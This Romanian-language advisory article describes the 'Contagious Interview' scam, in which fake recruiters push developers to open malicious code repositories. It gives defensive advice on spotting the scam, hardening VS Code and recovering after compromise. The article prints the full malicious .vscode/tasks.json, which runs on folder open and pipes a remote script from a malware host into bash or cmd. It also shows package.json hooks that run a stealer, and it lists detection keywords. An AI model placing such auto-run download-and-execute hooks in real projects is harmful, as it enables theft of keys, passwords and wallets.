Interviu Contagios: Cum recruiterii falși hackuiesc dezvoltatori
Rezumat: Un nou val de atacuri sponsorizate de stat lovește cei mai buni dezvoltatori din crypto. Escrocii se dau drept recruiteri sau CTO și forțează candidații să deschidă cod malițios. Acest articol disecă cazul „Martin Erazo”, exploit-ul VS Code „tasks.json” și „Protocolul de Ardere” necesar pentru supraviețuire.
Declinarea responsabilității: Acest articol citează incidente de securitate cibernetică unde are loc uzurparea identității unor persoane reale. Numele „Martin Erazo” și „Ara Vartanian” se referă la persoanele folosite de atacatori. Credem că persoanele reale din spatele acestor nume sunt victime nevinovate ale furtului de identitate.
1. Victima Perfectă: Persona „Martin Erazo”
Începe cu un mesaj care apasă toate butoanele potrivite pentru un Senior Dev:
- Rol: CTO / Lead Architect
- Buget: Finanțare asigurată de 6M USD
- Tech: Web3, AI, Infrastructură Descentralizată
Într-un atac confirmat recent, un recruiter pe nume „Martin Erazo” a contactat prin LinkedIn. Profilul folosea numele și imaginea unui regizor de teatru real, dar istoricul de muncă era fals și s-a schimbat brusc în „IT Project Management” în 2025 - un semn clasic al unui cont compromis sau cumpărat.
Înșelătoria se mișcă repede. Sar peste screening-ul tipic HR și merg direct la un „Interviu Tehnic” cu un executiv senior - în acest caz, o imitație a CTO-ului real din industrie Ara Vartanian (în prezent la Limit Break).
Steag Roșu: Numele proiectelor se schimbă constant. Recruiterul vinde „Betfin” (o platformă GameFi), dar prezentarea trimisă este pentru „SpaceXView” (un proiect Metaverse). Această neconcordanță este un indiciu că escrocii reciclează active între campanii.
2. Capcana: „Poți verifica codul nostru MVP?”
Falsul „CTO” susține că au nevoie de ochii tăi experți pentru a verifica codul MVP (Minimum Viable Product). Trimit un link GitHub Repo sau un fișier ZIP și te presează să-l deschizi în timpul interviului sau imediat după.
Aici se întâmplă hack-ul.
Ei exploatează dorința ta de a ajuta și ego-ul tău. Crezi că cauți un bug într-o componentă React. În realitate, „bug-ul” este un „feature” conceput pentru a-ți fura economiile de o viață.
3. Pătrunderea Tehnică: Zero-Click Malware
Atacatorii folosesc exploit-uri „zero-click” sau „low-click” care țintesc uneltele de dezvoltator. Nu trebuie să rulezi aplicația; doar deschiderea folderului este suficientă.
Arma: .vscode/tasks.json
În acest caz specific, Repo-ul conținea un fișier .vscode/tasks.json infectat. Acest fișier spune VS Code cum să construiască proiectul.
Cod Malițios:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Acesta este declanșatorul. Imediat ce deschizi folderul în VS Code, această sarcină rulează automat.
- Payload: Folosește curl pentru a descărca un script de la
vscodesettingtask.vercel.app- o gazdă de malware cunoscută, deghizată ca un API de setări. - Rezultat: Scriptul rulează în memorie și fură imediat parole Chrome, cookie-uri de sesiune și chei SSH.
Planul B: package.json scripts
Dacă hack-ul VS Code eșuează, au scripturi npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Rularea npm install sau npm start declanșează server/server.js - un script local C2 (Command and Control) care scurge Variabilele de Mediu (chei AWS, seed-uri de portofel) către atacator.
4. Steaguri Roșii vs Steaguri Verzi
Cum să depistezi asta înainte să fie prea târziu?
Dacă ești un dezvoltator, „Repo-urile Private” sau fișierele ZIP ar trebui să declanșeze alarme de nivel înalt. Companiile legitime folosesc Repo-uri Publice sau platforme de testare standardizate.
Avertisment: Aceasta nu este singura cale de atac asupra dezvoltatorilor. Citește despre Capcana Colaboratorului pe Discord și cum Atacurile asupra Lanțului de Aprovizionare fac dependențele nesigure.
| 🚩 Steag Roșu (Fugi) | ✅ Steag Verde (Sigur) |
|---|---|
| Cod Mai Întâi: Trimite cod înainte de oferta de muncă | Proces Standard: Interviu mai întâi, cod după |
| Identitate Ruptă: Recruiterul are un trecut nelegat (ex. Artist -> IT Manager) | Istoric Verificat: Cariera pe LinkedIn este consistentă |
| Nepotrivire: Numele proiectelor nu se potrivesc (Betfin vs SpaceXView) | Consistență: Nume, documentație și site se potrivesc |
| Urgență: „CTO-ul așteaptă”, „deschide acum” | Răbdare: Îți respectă timpul și programul |
| Email Personal: [email protected] | Email Corporativ: [email protected] (cu înregistrări MX funcționale) |
5. Protocol de Securitate: Cum să dai interviu în siguranță
Dacă ești Senior Dev, te vor vâna. Întărirea mediului tău este obligatorie.
Protocol 1: Mediu „Burner”
Nu îți folosi niciodată stația de lucru principală pentru teste de cod.
- Mașini Virtuale: Folosește VirtualBox sau VMWare.
- Medii Cloud Dev: Folosește GitHub Codespaces sau Gitpod. Acestea sunt efemere și izolate de fișierele tale locale de portofel.
Protocol 2: Audit Criminalistic
Înainte de a deschide cod necunoscut:
- Verifică .vscode/tasks.json: Caută
runOn: folderOpen. - Verifică package.json: Caută scripturi suspecte preinstall sau postinstall.
- Cuvinte cheie: grep pentru
curl,wget,os.homedir(),.ssh,wallet.
Protocol 3: Întărire VS Code
Dezactivează „Workspace Trust” la nivel global.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Asta forțează VS Code să ceară permisiunea înainte de a rula sarcini la nivel de folder.
6. Soluția: „Protocolul de Ardere” (Burn Protocol)
Dacă ai deschis un Repo malițios (ca cel trimis de persona „Martin Erazo”), presupune că ești compromis. O resetare nu este suficientă.
- Deconectare: Scoate cablul de rețea imediat.
- Arde Portofelele: Cheile tale Private sunt sculse. Creează portofele noi pe un dispozitiv curat (telefon) și mută fondurile rămase. Nu refolosi niciodată seed-ul vechi.
- Omoară Sesiunile: Deconectează-te de la toate sesiunile pe Google, GitHub, AWS. Revocă activ token-urile.
- Verificare Cheie SSH: Verifică setările GitHub/GitLab. Atacatorii adaugă adesea propriile chei SSH pentru a menține accesul prin ușa din spate. Șterge tot ce nu recunoști.
- Nuke It: Șterge discul și reinstalează sistemul de operare. Este singurul mod de a fi 100% sigur că Rootkit-urile au dispărut.
Concluzie
Înșelătoria „Interviu Contagios” îți folosește propria expertiză împotriva ta. Țintește dorința ta de a rezolva probleme. Dar în Web3, paranoia este o virtute profesională. Verifică fiecare identitate, izolează fiecare repo și nu avea niciodată încredere într-un „recruiter” care se grăbește să te facă să rulezi cod.
Gata să-ți Pui Cunoașterea în Practică?
Începe să tranzacționezi cu încredere alimentată de IA astăzi
ÎncepeArticole Asemănătoare
Otravă în Lanțul de Aprovizionare (Supply Chain Poison): Când actualizările de încredere devin malware
Nu ai descărcat nimic ciudat. Doar ai actualizat aplicația Ledger... Și atunci au dispărut banii. Teroarea unui atac asupra lanțului de aprovizionare.
Scutul de Hârtie (The Paper Shield): Cum să faci backup corect la Seed Phrase
Capturile de ecran sunt dezastruoase. Cloud-ul este computerul altcuiva. Singura modalitate sigură de a-ți stoca cheile private este 'Oțelul' și 'Hârtia'.
The Long Con: Psihologia din spatele 'Pig Butchering'
Nu a trimis un mesaj la un număr greșit. Și nu este îndrăgostită de tine. O privire profundă asupra 'Sha Zhu Pan', cea mai crudă înșelătorie din crypto, și cum să depistezi scenariul.